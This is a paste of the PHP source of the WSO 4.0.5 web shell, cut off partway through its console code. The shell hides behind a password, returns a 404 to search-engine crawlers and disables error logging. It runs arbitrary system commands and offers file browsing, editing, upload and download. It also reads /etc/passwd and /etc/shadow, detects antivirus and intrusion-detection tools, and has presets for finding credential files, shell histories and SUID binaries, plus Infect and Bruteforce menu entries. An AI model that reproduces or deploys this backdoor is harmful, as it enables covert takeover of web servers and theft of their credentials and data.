· 5 years ago · Feb 09, 2020, 05:33 AM
1<?php
2/* WSO 4.0.5 (Web Shell by HARD _LINUX) */
3$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
4$color = "#fff";
5$default_action = 'FilesMan';
6@define('SELF_PATH', __FILE__);
7if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
8 header('HTTP/1.0 404 Not Found');
9 exit;
10}
11@session_start();
12@error_reporting(0);
13@ini_set('error_log',NULL);
14@ini_set('log_errors',0);
15@ini_set('max_execution_time',0);
16@set_time_limit(0);
17@set_magic_quotes_runtime(0);
18@define('VERSION', '4.0.5');
19if( get_magic_quotes_gpc() ) {
20 function stripslashes_array($array) {
21 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
22 }
23 $_POST = stripslashes_array($_POST);
24}
25function printLogin() {
26 if(!empty($_SERVER['HTTP_USER_AGENT'])) {
27 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
28 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
29 header('HTTP/1.0 404 Not Found');
30 exit;
31 }
32 }
33 die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;'><input type=submit value='>>' style='border:none;background-color:teal;color:#fff;'></form></pre>");
34}
35if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
36 if( empty( $auth_pass ) ||
37 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
38 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
39 else
40 printLogin();
41if( strtolower( substr(PHP_OS,0,3) ) == "win" )
42 $os = 'win';
43else
44 $os = 'nix';
45$safe_mode = @ini_get('safe_mode');
46$disable_functions = @ini_get('disable_functions');
47$home_cwd = @getcwd();
48if( isset( $_POST['c'] ) )
49 @chdir($_POST['c']);
50$cwd = @getcwd();
51if( $os == 'win') {
52 $home_cwd = str_replace("\\", "/", $home_cwd);
53 $cwd = str_replace("\\", "/", $cwd);
54}
55if( $cwd[strlen($cwd)-1] != '/' )
56 $cwd .= '/';
57function printHeader() {
58 if(empty($_POST['charset']))
59 $_POST['charset'] = "UTF-8";
60 global $color;
61 ?>
62<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
63<style>
64 body {background-color:#000;color:#e1e1e1;}
65 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
66 table.info {color:#C3C3C3;background-color:#000;}
67 span,h1,a {color:<?=$color?> !important;}
68 span {font-weight:bolder;}
69 h1 {border-left:5px solid teal;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}
70 div.content {padding:5px;margin-left:5px;background-color:#000;}
71 a {text-decoration:none;}
72 a:hover {text-decoration:underline;}
73 .ml1 {border:1px solid #444;padding:5px;margin:0;overflow:auto;}
74 .bigarea {width:100%;height:250px; }
75 input, textarea, select {margin:0;color:#fff;background-color:#444;border:1px solid #000; font:9pt Courier New;}
76 form {margin:0px;}
77 #toolsTbl {text-align:center;}
78 .toolsInp {width:300px}
79 .main th {text-align:left;background-color:#000;}
80 .main tr:hover{background-color:#5e5e5e}
81 .main td, th{vertical-align:middle}
82 .l1 {background-color:#444}
83 pre {font:9pt Courier New;}
84</style>
85<script>
86 function set(a,c,p1,p2,p3,charset) {
87 if(a != null)document.mf.a.value=a;
88 if(c != null)document.mf.c.value=c;
89 if(p1 != null)document.mf.p1.value=p1;
90 if(p2 != null)document.mf.p2.value=p2;
91 if(p3 != null)document.mf.p3.value=p3;
92 if(charset != null)document.mf.charset.value=charset;
93 }
94 function g(a,c,p1,p2,p3,charset) {
95 set(a,c,p1,p2,p3,charset);
96 document.mf.submit();
97 }
98 function a(a,c,p1,p2,p3,charset) {
99 set(a,c,p1,p2,p3,charset);
100 var params = "ajax=true";
101 for(i=0;i<document.mf.elements.length;i++)
102 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
103 sr('<?=$_SERVER['REQUEST_URI'];?>', params);
104 }
105 function sr(url, params) {
106 if (window.XMLHttpRequest) {
107 req = new XMLHttpRequest();
108 req.onreadystatechange = processReqChange;
109 req.open("POST", url, true);
110 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
111 req.send(params);
112 }
113 else if (window.ActiveXObject) {
114 req = new ActiveXObject("Microsoft.XMLHTTP");
115 if (req) {
116 req.onreadystatechange = processReqChange;
117 req.open("POST", url, true);
118 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
119 req.send(params);
120 }
121 }
122 }
123 function processReqChange() {
124 if( (req.readyState == 4) )
125 if(req.status == 200) {
126 //alert(req.responseText);
127 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
128 var arr=reg.exec(req.responseText);
129 eval(arr[2].substr(0, arr[1]));
130 }
131 else alert("Request error!");
132 }
133</script>
134<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
135<form method=post name=mf style='display:none;'>
136<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
137<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
138<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
139<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
140<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
141<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
142</form>
143<?php
144 $freeSpace = @diskfreespace($GLOBALS['cwd']);
145 $totalSpace = @disk_total_space($GLOBALS['cwd']);
146 $totalSpace = $totalSpace?$totalSpace:1;
147 $release = @php_uname('r');
148 $kernel = @php_uname('s');
149 $millink='http://www.exploit-db.com/search/?action=search&description=';
150 if( strpos('Linux', $kernel) !== false )
151 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
152 else
153 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
154 if(!function_exists('posix_getegid')) {
155 $user = @get_current_user();
156 $uid = @getmyuid();
157 $gid = @getmygid();
158 $group = "?";
159 } else {
160 $uid = @posix_getpwuid(@posix_geteuid());
161 $gid = @posix_getgrgid(@posix_getegid());
162 $user = $uid['name'];
163 $uid = $uid['uid'];
164 $group = $gid['name'];
165 $gid = $gid['gid'];
166 }
167 $cwd_links = '';
168 $path = explode("/", $GLOBALS['cwd']);
169 $n=count($path);
170 for($i=0;$i<$n-1;$i++) {
171 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
172 for($j=0;$j<=$i;$j++)
173 $cwd_links .= $path[$j].'/';
174 $cwd_links .= "\")'>".$path[$i]."/</a>";
175 }
176 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
177 $opt_charsets = '';
178 foreach($charsets as $item)
179 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
180
181 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Port Scanner'=>'PortScanner','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
182 if(!empty($GLOBALS['auth_pass']))
183 $m['Logout'] = 'Logout';
184 $m['Self remove'] = 'SelfRemove';
185 $menu = '';
186 foreach($m as $k => $v)
187 $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
188 $drives = "";
189 if ($GLOBALS['os'] == 'win') {
190 foreach( range('a','z') as $drive )
191 if (is_dir($drive.':\\'))
192 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
193 }
194 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
195 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-DB]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
196 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
197 '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;"><tr>'.$menu.'</tr></table><div>';
198}
199function printFooter() {
200 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
201?>
202</div>
203<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
204 <tr>
205 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
206 <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
207 </tr>
208 <tr>
209 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
210 <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
211 </tr>
212 <tr>
213 <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
214 <td><form method='post' ENCTYPE='multipart/form-data'>
215 <input type=hidden name=a value='FilesMAn'>
216 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
217 <input type=hidden name=p1 value='uploadFile'>
218 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
219 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
220 </tr>
221
222</table>
223</div>
224</body></html>
225<?php
226}
227if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
228if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
229function ex($in) {
230 $out = '';
231 if(function_exists('exec')) {
232 @exec($in,$out);
233 $out = @join("\n",$out);
234 }elseif(function_exists('passthru')) {
235 ob_start();
236 @passthru($in);
237 $out = ob_get_clean();
238 }elseif(function_exists('system')) {
239 ob_start();
240 @system($in);
241 $out = ob_get_clean();
242 }elseif(function_exists('shell_exec')) {
243 $out = shell_exec($in);
244 }elseif(is_resource($f = @popen($in,"r"))) {
245 $out = "";
246 while(!@feof($f))
247 $out .= fread($f,1024);
248 pclose($f);
249 }else return "↳ Unable to execute command\n";
250 return ($out==''?"↳ Query did not return anything\n":$out);
251}
252function viewSize($s) {
253 if($s >= 1073741824)
254 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
255 elseif($s >= 1048576)
256 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
257 elseif($s >= 1024)
258 return sprintf('%1.2f', $s / 1024 ) . ' KB';
259 else
260 return $s . ' B';
261}
262function perms($p) {
263 if (($p & 0xC000) == 0xC000)$i = 's';
264 elseif (($p & 0xA000) == 0xA000)$i = 'l';
265 elseif (($p & 0x8000) == 0x8000)$i = '-';
266 elseif (($p & 0x6000) == 0x6000)$i = 'b';
267 elseif (($p & 0x4000) == 0x4000)$i = 'd';
268 elseif (($p & 0x2000) == 0x2000)$i = 'c';
269 elseif (($p & 0x1000) == 0x1000)$i = 'p';
270 else $i = 'u';
271 $i .= (($p & 0x0100) ? 'r' : '-');
272 $i .= (($p & 0x0080) ? 'w' : '-');
273 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
274 $i .= (($p & 0x0020) ? 'r' : '-');
275 $i .= (($p & 0x0010) ? 'w' : '-');
276 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
277 $i .= (($p & 0x0004) ? 'r' : '-');
278 $i .= (($p & 0x0002) ? 'w' : '-');
279 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
280 return $i;
281}
282function viewPermsColor($f) {
283 if (!@is_readable($f))
284 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
285 elseif (!@is_writable($f))
286 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
287 else
288 return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
289}
290if(!function_exists("scandir")) {
291 function scandir($dir) {
292 $dh = opendir($dir);
293 while (false !== ($filename = readdir($dh))) {
294 $files[] = $filename;
295 }
296 return $files;
297 }
298}
299function which($p) {
300 $path = ex('which '.$p);
301 if(!empty($path))
302 return $path;
303 return false;
304}
305// Sec. Info go --------------------
306function actionSecInfo() {
307 printHeader();
308 echo '<h1>Server security information</h1><div class=content>';
309 function showSecParam($n, $v) {
310 $v = trim($v);
311 if($v) {
312 echo '<span>'.$n.': </span>';
313 if(strpos($v, "\n") === false)
314 echo $v.'<br>';
315 else
316 echo '<pre class=ml1>'.$v.'</pre>';
317 }
318 }
319
320 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
321 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
322 showSecParam('Open base dir', @ini_get('open_basedir'));
323 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
324 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
325 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
326 $temp=array();
327 if(function_exists('mysql_get_client_info'))
328 $temp[] = "MySql (".mysql_get_client_info().")";
329 if(function_exists('mssql_connect'))
330 $temp[] = "MSSQL";
331 if(function_exists('pg_connect'))
332 $temp[] = "PostgreSQL";
333 if(function_exists('oci_connect'))
334 $temp[] = "Oracle";
335 showSecParam('Supported databases', implode(', ', $temp));
336 echo '<br>';
337
338 if( $GLOBALS['os'] == 'nix' ) {
339 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
340 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
341 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
342 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
343 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
344 showSecParam('OS version', @file_get_contents('/proc/version'));
345 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
346 if(!$GLOBALS['safe_mode']) {
347 echo '<br>';
348 $temp=array();
349 foreach ($userful as $item)
350 if(which($item)){$temp[]=$item;}
351 showSecParam('Userful', implode(', ',$temp));
352 $temp=array();
353 foreach ($danger as $item)
354 if(which($item)){$temp[]=$item;}
355 showSecParam('Danger', implode(', ',$temp));
356 $temp=array();
357 foreach ($downloaders as $item)
358 if(which($item)){$temp[]=$item;}
359 showSecParam('Downloaders', implode(', ',$temp));
360 echo '<br/>';
361 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
362 showSecParam('HDD space', ex('df -h'));
363 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
364 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
365 if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
366 $temp = "";
367 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
368 $uid = @posix_getpwuid($_POST['p2']);
369 if ($uid)
370 $temp .= join(':',$uid)."\n";
371 }
372 echo '<br/>';
373 showSecParam('Users', $temp);
374 }
375 }
376 } else {
377 showSecParam('OS Version',ex('ver'));
378 showSecParam('Account Settings',ex('net accounts'));
379 showSecParam('User Accounts',ex('net user'));
380 }
381 echo '</div>';
382 printFooter();
383}
384// Sec. Info end --------------------
385// File tools go -----------------------
386function actionFilesTools() {
387 if( isset($_POST['p1']) )
388 $_POST['p1'] = urldecode($_POST['p1']);
389 if(@$_POST['p2']=='download') {
390 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
391 ob_start("ob_gzhandler", 4096);
392 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
393 if (function_exists("mime_content_type")) {
394 $type = @mime_content_type($_POST['p1']);
395 header("Content-Type: ".$type);
396 }
397 $fp = @fopen($_POST['p1'], "r");
398 if($fp) {
399 while(!@feof($fp))
400 echo @fread($fp, 1024);
401 fclose($fp);
402 }
403 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
404 }
405 exit;
406 }
407 if( @$_POST['p2'] == 'mkfile' ) {
408 if(!file_exists($_POST['p1'])) {
409 $fp = @fopen($_POST['p1'], 'w');
410 if($fp) {
411 $_POST['p2'] = "edit";
412 fclose($fp);
413 }
414 }
415 }
416 printHeader();
417 echo '<h1>File tools</h1><div class=content>';
418 if( !file_exists(@$_POST['p1']) ) {
419 echo 'File not exists';
420 printFooter();
421 return;
422 }
423 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
424 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
425 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
426 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
427 if( empty($_POST['p2']) )
428 $_POST['p2'] = 'view';
429 if( is_file($_POST['p1']) )
430 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
431 else
432 $m = array('Chmod', 'Rename', 'Touch');
433 foreach($m as $v)
434 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
435 echo '<br><br>';
436 switch($_POST['p2']) {
437 case 'view':
438 echo '<pre class=ml1>';
439 $fp = @fopen($_POST['p1'], 'r');
440 if($fp) {
441 while( !@feof($fp) )
442 echo htmlspecialchars(@fread($fp, 1024));
443 @fclose($fp);
444 }
445 echo '</pre>';
446 break;
447 case 'highlight':
448 if( is_readable($_POST['p1']) ) {
449 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
450 $code = highlight_file($_POST['p1'],true);
451 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
452 }
453 break;
454 case 'chmod':
455 if( !empty($_POST['p3']) ) {
456 $perms = 0;
457 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
458 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
459 if(!@chmod($_POST['p1'], $perms))
460 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
461 else
462 die('<script>g(null,null,null,null,"")</script>');
463 }
464 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
465 break;
466 case 'edit':
467 if( !is_writable($_POST['p1'])) {
468 echo 'File isn\'t writeable';
469 break;
470 }
471 if( !empty($_POST['p3']) ) {
472 @file_put_contents($_POST['p1'],$_POST['p3']);
473 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
474 }
475 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
476 $fp = @fopen($_POST['p1'], 'r');
477 if($fp) {
478 while( !@feof($fp) )
479 echo htmlspecialchars(@fread($fp, 1024));
480 @fclose($fp);
481 }
482 echo '</textarea><input type=submit value=">>"></form>';
483 break;
484 case 'hexdump':
485 $c = @file_get_contents($_POST['p1']);
486 $n = 0;
487 $h = array('00000000<br>','','');
488 $len = strlen($c);
489 for ($i=0; $i<$len; ++$i) {
490 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
491 switch ( ord($c[$i]) ) {
492 case 0: $h[2] .= ' '; break;
493 case 9: $h[2] .= ' '; break;
494 case 10: $h[2] .= ' '; break;
495 case 13: $h[2] .= ' '; break;
496 default: $h[2] .= $c[$i]; break;
497 }
498 $n++;
499 if ($n == 32) {
500 $n = 0;
501 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
502 $h[1] .= '<br>';
503 $h[2] .= "\n";
504 }
505 }
506 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
507 break;
508 case 'rename':
509 if( !empty($_POST['p3']) ) {
510 if(!@rename($_POST['p1'], $_POST['p3']))
511 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
512 else
513 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
514 }
515 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
516 break;
517 case 'touch':
518 if( !empty($_POST['p3']) ) {
519 $time = strtotime($_POST['p3']);
520 if($time) {
521 if(@touch($_POST['p1'],$time,$time))
522 die('<script>g(null,null,null,null,"")</script>');
523 else {
524 echo 'Fail!<script>document.mf.p3.value="";</script>';
525 }
526 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
527 }
528 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
529 break;
530 case 'mkfile':
531
532 break;
533 }
534 echo '</div>';
535 printFooter();
536}
537// File tools end ----------------------
538// Console go --------------------
539if($os == 'win')
540 $aliases = array(
541 "List Directory" => "dir",
542 "Find index.php in current dir" => "dir /s /w /b index.php",
543 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
544 "Show active connections" => "netstat -an",
545 "Show running services" => "net start",
546 "User accounts" => "net user",
547 "Show computers" => "net view",
548 "ARP Table" => "arp -a",
549 "IP Configuration" => "ipconfig /all"
550 );
551else
552 $aliases = array(
553 "List dir" => "ls -la",
554 "list file attributes on a Linux second extended file system" => "lsattr -va",
555 "show opened ports" => "netstat -an | grep -i listen",
556 "process status" => "ps aux",
557 "Find" => "",
558 "find all suid files" => "find / -type f -perm -04000 -ls",
559 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
560 "find all sgid files" => "find / -type f -perm -02000 -ls",
561 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
562 "find config.inc.php files" => "find / -type f -name config.inc.php",
563 "find config* files" => "find / -type f -name \"config*\"",
564 "find config* files in current dir" => "find . -type f -name \"config*\"",
565 "find all writable folders and files" => "find / -perm -2 -ls",
566 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
567 "find all service.pwd files" => "find / -type f -name service.pwd",
568 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
569 "find all .htpasswd files" => "find / -type f -name .htpasswd",
570 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
571 "find all .bash_history files" => "find / -type f -name .bash_history",
572 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
573 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
574 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
575 "Locate" => "",
576 "locate httpd.conf files" => "locate httpd.conf",
577 "locate vhosts.conf files" => "locate vhosts.conf",
578 "locate proftpd.conf files" => "locate proftpd.conf",
579 "locate psybnc.conf files" => "locate psybnc.conf",
580 "locate my.conf files" => "locate my.conf",
581 "locate admin.php files" =>"locate admin.php",
582 "locate cfg.php files" => "locate cfg.php",
583 "locate conf.php files" => "locate conf.php",
584 "locate config.dat files" => "locate config.dat",
585 "locate config.php files" => "locate config.php",
586 "locate config.inc files" => "locate config.inc",
587 "locate config.inc.php" => "locate config.inc.php",
588 "locate config.default.php files" => "locate config.default.php",
589 "locate config* files " => "locate config",
590 "locate .conf files"=>"locate '.conf'",
591 "locate .pwd files" => "locate '.pwd'",
592 "locate .sql files" => "locate '.sql'",
593 "locate .htpasswd files" => "locate '.htpasswd'",
594 "locate .bash_history files" => "locate '.bash_history'",
595 "locate .mysql_history files" => "locate '.mysql_history'",
596 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
597 "locate backup files" => "locate backup",
598 "locate dump files" => "locate dump",
599 "locate priv files" => "locate priv"
600 );
601
602function actionConsole() {
603 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
604 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
605 $_POST['p1'] .= ' 2>&1';
606 } elseif(!empty($_POST['p1']))
607 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = 0;
608
609 if(isset($_POST['ajax'])) {
610 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
611 ob_start();
612 echo "document.cf.cmd.value='';\n";
613 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
614 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
615 if(@chdir($match[1])) {
616 $GLOBALS['cwd'] = @getcwd();
617 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
618 }
619 }
620 echo "document.cf.output.value+='".$temp."';";
621 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
622 $temp = ob_get_clean();
623 echo strlen($temp), "\n", $temp;
624 exit;
625 }
626 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
627 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
628 printHeader();
629echo "<script>
630if(window.Event) window.captureEvents(Event.KEYDOWN);
631var cmds = new Array('');
632var cur = 0;
633function kp(e) {
634 var n = (window.Event) ? e.which : e.keyCode;
635 if(n == 38) {
636 cur--;
637 if(cur>=0)
638 document.cf.cmd.value = cmds[cur];
639 else
640 cur++;
641 } else if(n == 40) {
642 cur++;
643 if(cur < cmds.length)
644 document.cf.cmd.value = cmds[cur];
645 else
646 cur--;
647 }
648}
649function add(cmd) {
650 cmds.pop();
651 cmds.push(cmd);
652 cmds.push('');
653 cur = cmds.length-1;
654}
655</script>";
656 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
657 foreach($GLOBALS['aliases'] as $n => $v) {
658 if($v == '') {
659 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
660 continue;
661 }
662 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
663 }
664
